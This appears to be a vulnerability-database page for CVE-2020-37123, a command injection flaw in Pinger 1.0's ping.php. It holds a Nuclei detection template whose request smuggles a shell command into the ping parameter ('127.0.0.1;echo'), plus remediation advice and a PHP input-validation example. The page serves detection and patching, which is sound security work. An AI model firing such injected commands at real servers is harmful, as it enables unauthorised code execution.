Pinger 1.0 - Remote Code Execution
CVE-2020-37123
Verified
Description
Pinger 1.0 contains a remote code execution vulnerability that allows attackers to inject shell commands through the ping and socket parameters. Attackers can exploit the unsanitized input in ping.php to write arbitrary PHP files and execute system commands by appending shell metacharacters.
Severity
Critical
CVSS Score
9.8
Exploit Probability
16%
Affected Product
pinger
Published Date
February 7, 2026
Template Author
bswearingen
CVE-2020-37123.yaml
id: CVE-2020-37123

info:
  name: Pinger 1.0 - Remote Code Execution
  author: bswearingen
  severity: critical
  description: |
    Pinger 1.0 contains a remote code execution vulnerability that allows attackers to inject shell commands through the ping and socket parameters. Attackers can exploit the unsanitized input in ping.php to write arbitrary PHP files and execute system commands by appending shell metacharacters.
  impact: |
    An unauthenticated attacker can execute arbitrary system commands on the server.
  remediation: |
    Remove Pinger or apply input validation to sanitize the ping and socket parameters.
  reference:
    - https://www.exploit-db.com/exploits/48323
    - https://nvd.nist.gov/vuln/detail/CVE-2020-37123
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2020-37123
    epss-score: 0.15719
    epss-percentile: 0.94803
    cwe-id: CWE-78
  metadata:
    verified: true
    vendor: pinger
    product: pinger
  tags: cve,cve2020,pinger,rce,vkev

flow: http(1) && http(2)

http:
  - method: GET
    path:
      - "{{BaseURL}}"

    matchers:
      - type: word
        part: body
        words:
          - "ping.php"
        internal: true

  - raw:
      - |
        POST /ping.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        ping=127.0.0.1;echo+{{md5('CVE-2020-37123')}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "{{md5('CVE-2020-37123')}}"

      - type: status
        status:
          - 200
# digest: 4b0a004830460221008647a0750bd602055e461ef6752159334ba5bec26f6192799e376feb135ef3c40221008cae5074c6709e33baec6512ae1c23d5ad9641773101d50a7e22f2717d4cbdfc:922c64590222798bb761d5b6d8e72950
9.8 Score
CVSS Metrics
CVSS Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CVE ID:
CVE-2020-37123
CWE ID:
CWE-78
Remediation Steps
Remove Pinger or apply input validation to sanitize the ping and socket parameters.
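One way to apply the input validation this remediation calls for, shown as an added example that is neither Pinger's code nor part of the template. It assumes `ping` carries a hostname or IP address and `socket` a `host:port` pair; the function names are hypothetical.

```php
<?php
// Added example, not Pinger's source. Function names are hypothetical, and the
// host:port shape of the `socket` parameter is an assumption.

/** Return $value if it is an IP literal or a DNS hostname, otherwise null. */
function valid_host(string $value): ?string
{
    if (filter_var($value, FILTER_VALIDATE_IP) !== false) {
        return $value;
    }
    // Letters, digits and inner hyphens only; \z (not $) rejects a trailing
    // newline. No shell metacharacter or leading '-' can match.
    $label = '[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?';
    $ok = strlen($value) <= 253
        && preg_match("/\\A{$label}(?:\\.{$label})*\\z/i", $value) === 1;
    return $ok ? $value : null;
}

/** Return [host, port] for a valid "host:port" string, otherwise null. */
function valid_socket(string $value): ?array
{
    // Split on the last ':'; the port must be 1-5 ASCII digits.
    if (preg_match('/\A(.+):(\d{1,5})\z/', $value, $m) !== 1) {
        return null;
    }
    $host = valid_host($m[1]);
    $port = (int) $m[2];
    return ($host !== null && $port >= 1 && $port <= 65535) ? [$host, $port] : null;
}

/** Run Unix ping from an argument vector (PHP >= 7.4) so no shell parses $host. */
function run_ping(string $host): string
{
    $proc = proc_open(['ping', '-c', '1', $host], [1 => ['pipe', 'w']], $pipes);
    if (!is_resource($proc)) {
        throw new RuntimeException('could not start ping');
    }
    $out = stream_get_contents($pipes[1]);
    fclose($pipes[1]);
    proc_close($proc);
    return $out;
}

// Constructed inputs; the second has the shape of the template's probe.
foreach (['192.0.2.10', '127.0.0.1;echo test', '-c9', "example.org\n"] as $in) {
    echo json_encode($in), ' => ', valid_host($in) === null ? 'rejected' : 'accepted', "\n";
}
var_dump(valid_socket('example.org:8080'), valid_socket('example.org:80;echo test'));
```

A handler would call `valid_host()` on the submitted `ping` value and return an error when it yields null, passing only the validated value to `run_ping()`.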